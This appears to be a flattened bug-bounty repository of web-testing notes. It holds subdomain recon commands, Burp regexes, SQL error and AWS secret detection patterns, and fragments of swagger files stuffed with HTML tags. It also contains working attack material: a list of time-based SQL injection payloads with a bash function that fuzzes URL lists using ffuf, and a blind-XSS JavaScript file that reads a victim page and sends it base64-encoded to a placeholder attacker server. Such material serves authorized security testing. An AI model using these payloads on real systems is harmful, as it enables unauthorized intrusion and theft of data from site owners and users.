Amass 33 | ```https://github.com/OWASP/Amass``` 34 | 35 | ```$ amass enum -d domain.com``` 36 | 37 | ### ~ Subfinder 38 | ```https://github.com/subfinder/subfinder``` 39 | 40 | ```$ ./subfinder -d domain.com -b -w jhaddix_all.txt -t 100``` 41 | 42 | ```jhaddix all.txt: https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056``` 43 | 44 | ### Unique subdomains list 45 | ```$ cat file1 file2 file3 | sort -u | tee uniqSubdomains``` 46 | 47 | 48 | 49 | 50 | 51 | ## 1.2 Burp Suite 52 | * 1.2.1 [Export unique subdomains to Burp Suite](https://github.com/ghsec/webHunt/blob/master/SubdomainsToBurp.md) 53 | 54 | * 1.2.2 [Recon with Burp](https://github.com/ghsec/webHunt/blob/master/ReconWithBurp_Suite.md) 55 | 56 | [Demo Videos:](https://www.youtube.com/watch?v=-6ck9WhdtPk&list=PLq8PHzHe7znWfoKfi2ieVVC42_11u4t_C) 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /OpenRedirect_SSRF.md: -------------------------------------------------------------------------------- 1 | ### Open Redirect|SSRF 2 | 3 | Possible Open Redirect | SSRF detection Regexp 4 | 5 | ``` 6 | (=|%3D|%253D|%25253D)(http(s)?(%3A%2F%2F|%253A%252F%252F|%25253A%25252F%25252F|:\/\/)|aHR0c)|PWh0dH 7 | ``` 8 | 9 | ### Detect Open Redirect in response 10 | 11 | ``` 12 | .*?; *?URL *?= *?(.*)|window\.location(\s=\s|\.href|\.replace)?(\(|\s=\s)?(https\:\/\/www\.)?google\.com(\))|Location:\shttps:\/\/www\.google\.com 13 | ``` 14 | #### Payloads: 15 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect/Intruder 16 | -------------------------------------------------------------------------------- /RCE.md: -------------------------------------------------------------------------------- 1 | ### RCE: 2 | 3 | ##### Payloads: 4 | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection/Intruder 5 | 6 | ##### Regexp | Keywords 7 | Search in response 8 | ``` 9 | root:|(uid|gid|groups)=\d+|bytes from \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|Configuration File \(php\.ini\) Path |vulnerable 10|Trying \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\s+localhost|BROADCAST,MULTICAST|drwxr-xr|Active Internet connections|Syntax error|sh:|Average Speed Time|dir: cannot access||drwxrwxr|GNU/Linux 10 | ``` 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # WebHunt 3 | ======= 4 | # The Amazing WebHunt! 5 | 6 | 7 | Twitter: @[GochaOqradze](https://twitter.com/GochaOqradze) 8 | 9 | ``` 10 | An Amazing Project 11 | Web app testing for Bug Bounty Hunting with Burp Suite Pro|Community version 12 | ``` 13 | 14 | ### Donate me: 15 | https://www.paypal.me/Okradze 16 | 17 | ======= 18 | 19 | Thank You and Don't forgate to donate! 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /ReconWithBurp_Suite.md: -------------------------------------------------------------------------------- 1 | # Recon with BurpSuite "სიყვარულით საქართველოდან" 2 | 3 | ### Download and run 4 | * Download [Burp Suite](https://portswigger.net/burp/communitydownload) 5 | * Run in terminal 6 | ``` 7 | java -jar burpsuite_community_v1.7.36.jar 8 | ``` 9 | 10 | ### Set scope 11 | * Scope --> Use advansed scope control --> Add --> host or IP range == target 12 | 13 | ![Scope](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-25-10.png) 14 | 15 | ### Spidering 16 | * Select all host in sitemap and Spider. 17 | * Do it again and again if new hosts are noticed. 18 | 19 | ### Recon for new Subdomains 20 | * Collect new subdimains which is not detected by spider. in request | response body. 21 | ``` 22 | (http[s]?:\/\/)?((-)?[\w+\.]){1,20}domain\.com 23 | ``` 24 | Note: click + button and check regex && Auto-scroll to match when text changes 25 | 26 | ![ReconSubdomain](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-40-35.png) 27 | 28 | ### Extract endpoints from js file 29 | note: regex taken from Linkfinder by GerbenJavado 30 | ``` 31 | (?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|') 32 | ``` 33 | ![Endpoints](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2009-56-26.png) 34 | 35 | ### Internal | External IP address 36 | ``` 37 | \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b 38 | ``` 39 | ![IP](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2010-08-11.png) 40 | -------------------------------------------------------------------------------- /SQLiError.md: -------------------------------------------------------------------------------- 1 | ### Sqli Error 2 | Injection points - heders|Cookie|path, GET|POST parameters 3 | 4 | ### Error Regexps 5 | ``` 6 | (Exception (condition )?\d+\. Transaction rollback|com\.frontbase\.jdbc|org\.h2\.jdbc|Unexpected end of command in statement \["|Unexpected token.*?in statement \[|org\.hsqldb\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\bdb2_\w+\(|SQLSTATE.+SQLCODE|com\.ibm\.db2\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\]Ibm|DB2Exception|Warning.*?\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\.informix\.jdbc|weblogic\.jdbc\.informix|Pdo[./_\\]Informix|IfxException|Warning.*?\Wingres_|Ingres SQLSTATE|Ingres\W.*?Driver|com\.ingres\.gcf\.jdbc|Dynamic SQL Error|Warning.*?\Wibase_|org\.firebirdsql\.jdbc|Pdo[./_\\]Firebird|Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \(missing operator\) in query expression|Driver.*? SQL[\-\_\ ]*Server|OLE DB.*? SQL Server|\bSQL Server[^<"]+Driver|Warning.*?\W(mssql|sqlsrv)_|\bSQL Server[^<"]+[0-9a-fA-F]{8}|System\.Data\.SqlClient\.SqlException|(?s)Exception.*?\bRoadhouse\.Cms\.|Microsoft SQL Native Client error '[0-9a-fA-F]{8}|\[SQL Server\]|ODBC SQL Server Driver|ODBC Driver \d+ for SQL Server|SQLServer JDBC Driver|com\.jnetdirect\.jsql|macromedia\.jdbc\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\.microsoft\.sqlserver\.jdbc|Pdo[./_\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column '[^ ]+' in 'field list'|MySqlClient\.|com\.mysql\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\]Mysql|MySqlException|\bORA-\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\.jdbc\.oracle|oracle\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\Wpg_|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\.postgresql\.jdbc|Pdo[./_\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\Wmaxdb_|DriverSapDB|com\.sap\.dbtech\.jdbc|SQLite/JDBCDriver|SQLite\.Exception|(Microsoft|System)\.Data\.SQLite\.SQLiteException|Warning.*?\W(sqlite_|SQLite3::)|\[SQLITE_ERROR\]|SQLite error \d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\.sqlite\.JDBC|Pdo[./_\\]Sqlite|SQLiteException|Warning.*?\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\.Data\.AseClient|com\.sybase\.jdbc) 7 | ``` 8 | 9 | #### Payloads: 10 | ``` 11 | ' 12 | " 13 | \ 14 | ` 15 | * 16 | ``` 17 | -------------------------------------------------------------------------------- /Secret_Patterns_db.MD: -------------------------------------------------------------------------------- 1 | ## AWS API Gateway 2 | 3 | ``` 4 | [0-9a-z]+.execute-api.[0-9a-z._-]+.amazonaws.com 5 | ``` 6 | 7 | Example: https://grep.app/search?q=%5B0-9a-z%5D%2B.execute-api.%5B0-9a-z._-%5D%2B.amazonaws.com®exp=true 8 | 9 | 10 | ## AWS API Key 11 | 12 | ``` 13 | AKIA[0-9A-Z]{16} 14 | ``` 15 | 16 | Example: https://grep.app/search?q=AKIA%5B0-9A-Z%5D%7B16%7D®exp=true 17 | 18 | ## AWS ARN 19 | 20 | ``` 21 | arn:aws:[a-z0-9-]+:[a-z]{2}-[a-z]+-[0-9]+:[0-9]+:.+ 22 | ``` 23 | 24 | Example: https://grep.app/search?q=arn%3Aaws%3A%5Ba-z0-9-%5D%2B%3A%5Ba-z%5D%7B2%7D-%5Ba-z%5D%2B-%5B0-9%5D%2B%3A%5B0-9%5D%2B%3A.%2B®exp=true 25 | 26 | ## AWS AppSync GraphQL Key 27 | ``` 28 | da2-[a-z0-9]{26} 29 | ``` 30 | 31 | Example: https://grep.app/search?q=da2-%5Ba-z0-9%5D%7B26%7D®exp=true 32 | 33 | 34 | -------------------------------------------------------------------------------- /SubRegex.md: -------------------------------------------------------------------------------- 1 | ### Extract Subdomains with burp + regexp 2 | ``` 3 | ([a-zA-Z0-9-_]{1,}\.){1,}domian\.com" 4 | ``` 5 | 6 | ### Terminal : OneLiner 7 | ``` 8 | cat urls | grep -oP "([a-zA-Z0-9-_]{1,}\.){1,}domain\.com" | tr -d "2F" | sort -u 9 | ``` 10 | -------------------------------------------------------------------------------- /SubdomainsToBurp.md: -------------------------------------------------------------------------------- 1 | # Subdomains to Burp Suite 2 | Export subdmains from file to Burp suite by [@tvmpt](https://twitter.com/tvmpt) 3 | 4 | ```cat | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s``` 5 | -------------------------------------------------------------------------------- /Time-Based-SQLi.md: -------------------------------------------------------------------------------- 1 | ## Time Based Sql Injection with ffuf 2 | Check url list for time based sqli with ffuf 3 | 4 | need install ffuf and qsreplace 5 | 6 | * ffuf: ```go get -u github.com/ffuf/ffuf``` 7 | * qsreplace: ```go get -u github.com/tomnomnom/qsreplace``` 8 | 9 | 10 | 11 | 12 | * Payloads: save this in payloads file 13 | 14 | ``` 15 | XOR(if(now()=sysdate(),sleep(5),0))OR%27 16 | if(now()=sysdate(),sleep(5),0) 17 | (select(0)from(select(sleep(5)))v)/*%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22*/ 18 | %27XOR(if(now()=sysdate(),sleep(5*1),0))XOR%27Z 19 | 1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27 20 | 1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27 21 | 1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337 22 | 1%20or%20sleep(5)%23 23 | %27%20WAITFOR%20DELAY%20%270:0:5%27-- 24 | %%27;SELECT%20PG_SLEEP(5)-- 25 | pg_sleep(5) 26 | %27|%20|pg_sleep(5)-- 27 | ``` 28 | 29 | 30 | * Add in .bashrc function 31 | 32 | ``` 33 | # Time Based Sql Injection 34 | sqliTime(){ 35 | for i in $(cat ~/.pathToPayloadsList/payloads) ; do 36 | cat $1 | qsreplace "$i" > sqli 37 | ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt 38 | rm sqli 39 | done 40 | } 41 | ``` 42 | 43 | ### Usage: 44 | ``` 45 | sqliTime urls.txt 46 | ``` 47 | -------------------------------------------------------------------------------- /WEB APPLICATION PENTESTING CHECKLIST.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/WEB APPLICATION PENTESTING CHECKLIST.pdf -------------------------------------------------------------------------------- /WebDAV.md: -------------------------------------------------------------------------------- 1 | # WebDAV 2 | 3 | Verify if the WebDAV module is properly configured. 4 | 5 | ``` 6 | CONTENT_TYPE = Headers([('content-type', 'application/xml; charset="utf-8"')]) 7 | ``` 8 | 9 | ### Test SEARCH method 10 | 11 | ``` 12 | 13 | 14 | Select 'DAV:displayname' from scope() 15 | 16 | ``` 17 | 18 | #### Detect 19 | ``` 20 | xmlns:a="DAV:" 21 | 22 | ``` 23 | 24 | 25 | If response is 200, 300 with directory name and path Directory listing with HTTP SEARCH method was found 26 | 27 | 28 | 29 | ### Test PROPFIND method 30 | 31 | ``` 32 | 33 | 34 | 35 | 36 | 37 | " 38 | ``` 39 | 40 | ### Tests PUT method. 41 | 42 | 43 | ``` 44 | headers = Headers([('content-type', 'text/plain')]) 45 | 46 | ``` 47 | 48 | File upload with HTTP PUT method was found at resource if file is uploaded 49 | 50 | DAV seems to be incorrectly configured. The web server answered with a 500 error code. 51 | In most cases, this means that the DAV extension failed in some way. 52 | 53 | if 403 DAV seems to be correctly configured and allowing you to use the PUT method but 54 | the directory does not have the right permissions that would allow the web server to write to it 55 | 56 | This technique finds WebDAV configuration errors. These errors are generally server configuration 57 | errors rather than a web application errors. To check for vulnerabilities of this kind, try to PUT 58 | a file on a directory that has WebDAV enabled, if the file is uploaded successfully, then we have found a bug 59 | -------------------------------------------------------------------------------- /bxss_js.md: -------------------------------------------------------------------------------- 1 | ## BXSS file 2 | 3 | `````` 4 | 5 | 6 | 7 | ### Content of JS file 8 | 9 | ``` 10 | var xhr = new XMLHttpRequest(); 11 | xhr.open('GET', 'http://Victim.com/path/file.php', true); 12 | xhr.setRequestHeader('Content-type', 'application/x-www-urlencoded'); 13 | 14 | xhr.onload = function () { 15 | var request = new XMLHttpRequest(); 16 | request.open('GET', 'http://YorServerHere:PORT/?code=' + btoa(xhr.responseText), true); 17 | request.send(); 18 | }; 19 | 20 | xhr.send(); 21 | 22 | ``` 23 | 24 | 25 | reference: https://xakep.ru/2021/03/22/htb-crossfit-xss/ 26 | -------------------------------------------------------------------------------- /content_discovery.md: -------------------------------------------------------------------------------- 1 | # Content Discovery: 2 | 3 | ## Tools: 4 | * [Ffuf](https://github.com/ffuf/ffuf) 5 | * [Dirsearch](https://github.com/maurosoria/dirsearch) 6 | 7 | ## Wordlists: 8 | * [RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) 9 | * [SecLists Web Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content) 10 | * [content_discovery_nullenc0de](https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7) 11 | * [content_discovery_all](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) 12 | * [commonspeak2](https://github.com/assetnote/commonspeak2-wordlists) 13 | -------------------------------------------------------------------------------- /file_upload.md: -------------------------------------------------------------------------------- 1 | ### file_upload 2 | 3 | Uploads a file and then searches for the file inside all known directories. 4 | 5 | #### Common Upload Path 6 | ``` 7 | uploads 8 | upload 9 | up 10 | files 11 | file 12 | user 13 | content 14 | images 15 | documents 16 | docs 17 | downloads 18 | download 19 | down 20 | public 21 | pub 22 | private 23 | ``` 24 | Analyze results of the _send_mutant method. 25 | In this case, check if the file was uploaded to any of the known directories, or one of the "default" ones like "upload" or "files" 26 | 27 | 28 | Parse the HTTP response and find our file. 29 | Take into account that the file name might have been changed (we do not care) if the extension remains the same then we're happy. 30 | 31 | Use the framework's knowledge to find the file in all possible locations 32 | -------------------------------------------------------------------------------- /htmlattribs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/htmlattribs -------------------------------------------------------------------------------- /paramName-inputTag.md: -------------------------------------------------------------------------------- 1 | ## collect hidden parameters 2 | 3 | OneLiner: Collect hidden parameters from requests with parallel and grep 4 | 5 | command greps parameters name in input tag 6 | 7 | Exampele: `````` command extracts ```something``` parameter name 8 | 9 | 10 | ### Terminal: 11 | 12 | ``` 13 | cat urls | parallel -j 200 curl -s {} | grep "

test

12 | tags: 13 | - accounts

test

14 | operationId: findAccounts

test

15 | summary: Finds all accounts

test

16 | -------------------------------------------------------------------------------- /wordlists/2.json: -------------------------------------------------------------------------------- 1 | swagger: '2.0' 2 | info: 3 | title: Example yaml.spec 4 | description: | 5 |